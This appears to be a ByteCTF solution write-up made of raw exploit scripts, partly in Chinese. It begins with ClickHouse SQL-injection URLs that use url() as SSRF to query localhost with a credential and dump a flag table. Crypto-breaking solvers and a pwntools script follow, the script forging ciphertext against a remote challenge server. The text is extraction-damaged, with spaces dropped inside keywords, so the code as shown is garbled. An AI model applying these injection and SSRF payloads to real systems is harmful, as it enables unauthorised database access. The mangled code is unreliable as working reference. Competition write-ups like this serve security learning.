http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.tables'%2C%20CSV%2C%20'column1%20String') 获得表名 : flag
http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.columns'%2C%20CSV%2C%20'column1%20String') 获得列名 : flag
http://39.105.175.150:30001/?id=1 union all select * from url('http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bflag%2Bfrom%2Bctf.flag'%2C%20CSV%2C%20'column1%20String') 获得flag : ByteCTF{e3b0c44298fc1c149afbf4c8}
defshift(m, k, c): if k < 0: return m ^ m >> (-k) & c return m ^ m << k & c
defconvert(m, key): c_list = [0x37386180af9ae39e, 0xaf754e29895ee11a, 0x85e1a429a2b7030c, 0x964c5a89f6d3ae8c] for t inrange(4): m = shift(m, key[t], c_list[t]) return m from Crypto.Util.number import bytes_to_long, long_to_bytes from random import randint, getrandbits
keys = [randint(-32, 32) for _ inrange(4)] iv=getrandbits(64) print(iv) for _ inrange(4): iv=convert(iv,keys) print(iv)
s='89b8aca257ee2748f030e7f6599cbe0cbb5db25db6d3990d3b752eda9689e30fa2b03ee748e0da3c989da2bba657b912' c1,c2=s[:len(s)//2],s[len(s)//2:] c1=[int(c1[i:i+16],16) for i inrange(0,len(c1),16)] c2=[int(c2[i:i+16],16) for i inrange(0,len(c2),16)] m1=b'ByteCTF{' m1=bytes_to_long(m1) iv_1=m1^c1[0] print(iv_1) ''' import string f=open(r'D:\\桌面\out.txt','w') for a in range(-32,33): for b in range(-32,33): for c in range(-32,33): for d in range(-32,33): key=[a,b,c,d] kk=convert(iv_1,key) m=c1[1]^kk flag=long_to_bytes(m) try: if all(c in string.printable for c in flag.decode()): f.write(flag.decode()+str(key)+'\n') except: pass ''' ''' key=[-12, 26, -3, -31] f=b'' for i in c1: f+=long_to_bytes(iv_1^i) iv_1=convert(iv_1,key) print(f) '''
#ByteCTF{5831a241s-f30980
key=[-12, 26, -3, -31]
中间有个筛选过程:
f=open(r'D:\\桌面\out.txt','r') ff=open(r'D:\\桌面\final.txt.','w') xxx=['"','*','\'','@','~','&','~','$','\\','|','!','{','%','}','?','=','<',';','#','^','/','*'',','.','+',':','>','(',')',] for i in f.readlines(): ifall(x notin xxx for x in i): ff.write(i+'\n') ff.close()
得到key和前半段再解后半段CBC
from Crypto.Util.number import * print(len(bin(bytes_to_long(b'f'*8))[2:])) key=[-12, 26, -3, -31] s='89b8aca257ee2748f030e7f6599cbe0cbb5db25db6d3990d3b752eda9689e30fa2b03ee748e0da3c989da2bba657b912' c1,c2=s[:len(s)//2],s[len(s)//2:] c1=[int(c1[i:i+16],16) for i inrange(0,len(c1),16)] c2=[int(c2[i:i+16],16) for i inrange(0,len(c2),16)] ''' from z3 import * c_list = [0x37386180af9ae39e, 0xaf754e29895ee11a, 0x85e1a429a2b7030c, 0x964c5a89f6d3ae8c] ivv=[14682254609762378035]+c2 for i in ivv: s=Solver() m=BitVec('m',100) def shift(m, key, c_list): for i in range(4): if key[i]<0: m=m ^ m >> (-key[i]) & c_list[i] else: m=m ^ m << key[i] & c_list[i] return m s.add(shift(m,key,c_list)==i) if s.check()==sat: print(s.model()) ''' iv=[16476971533267772345,c2[0],c2[1]] dec=[10780708739817148043,738617756395427640,10936161096540945944] f=b'' for i inrange(3): f+=long_to_bytes(dec[i]^iv[i]) print(f)
import string from binascii import * from hashlib import * from pwn import *
f=False for _ inrange(255): p=remote('39.105.115.244',30001) context.log_level='debug'
alphabet = string.ascii_letters + string.digits defproof_of_work(end,sha): for a in alphabet: for b in alphabet: for c in alphabet: for d in alphabet: s=a+b+c+d+end if sha256(s.encode()).hexdigest()==sha: return a+b+c+d p.recvuntil('XXXX+') end=p.recvuntil(') == ')[:-5].decode() sha=p.recvuntil('\n')[:-1].decode() xxxx=proof_of_work(end,sha) p.recvuntil('Give me XXXX > ') p.sendline(xxxx)
p.recvuntil('Please enter your cipher in hex > ')
m=480*'61' p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1])
msg=b'\x00'+b'ello, I\'m a Bytedancer. Please give me the flag!' pad=64-len(msg) for i inrange(len(msg)): ivs=ord('a')^plain[i] gg=hex(ivs^msg[i])[2:].zfill(2) m=m[:i*2]+gg+m[2*i+2:] p.recvuntil('Please enter your cipher in hex > ') p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1]) print(plain) if plain[0]==ord('H'): f=True else: break
ivs=ord('a')^plain[63] gg=hex(ivs^pad)[2:].zfill(2) m=m[:126]+gg p.recvuntil('Please enter your cipher in hex > ') p.sendline(m) p.recvuntil('Your plaintext in hex: \n') plain=unhexlify(p.recvuntil('\n')[:-1]) print(plain) if f: p.recvall() break
import itertools defsmall_roots(f, bounds, m=1, d=None): ifnot d: d = f.degree() R = f.base_ring() N = R.cardinality() f /= f.coefficients().pop(0) f = f.change_ring(ZZ) G = Sequence([], f.parent()) for i inrange(m+1): base = N^(m-i) * f^i for shifts in itertools.product(range(d), repeat=f.nvariables()): g = base * prod(map(power, f.variables(), shifts)) G.append(g) B, monomials = G.coefficient_matrix() monomials = vector(monomials) factors = [monomial(*bounds) for monomial in monomials] for i, factor inenumerate(factors): B.rescale_col(i, factor) B = B.dense_matrix().LLL() B = B.change_ring(QQ) for i, factor inenumerate(factors): B.rescale_col(i, 1/factor) H = Sequence([], f.parent().change_ring(QQ)) for h infilter(None, B*monomials): H.append(h) I = H.ideal() if I.dimension() == -1: H.pop() elif I.dimension() == 0: roots = [] for root in I.variety(ring=ZZ): root = tuple(R(root[var]) for var in f.variables()) roots.append(root) return roots return [] from pwn import *
#0123456789abcdef print(hex((0x15*0x32+3*0x33+1*0x30+5*0x31))) print(hex(0xd*0x32+2*0x33+1*0x30+8*0x31)) print(hex(0x8*0x32+1*0x33+2*0x30+0xd*0x31)) print(hex((0x5*0x32+1*0x33+3*0x30+0x15*0x31))) # for a1 in range(0x20,0x7f): # for a2 in range(0x20,0x7f): # for a3 in range(0x20,0x7f): # for a4 in range(0x20,0x7f): # if 0x55f==(0x15*a1+3*a2+1*a3+5*a4) and 0x559==(0xd*a1+2*a2+1*a3+8*a4) and\ # 0x6da== (0x8*a1+1*a2+2*a3+0xd*a4) and 0x9e1==(0x5*a1+1*a2+3*a3+0x15*a4) : # print(chr(a3)+chr(a4)+chr(a1)+chr(a2))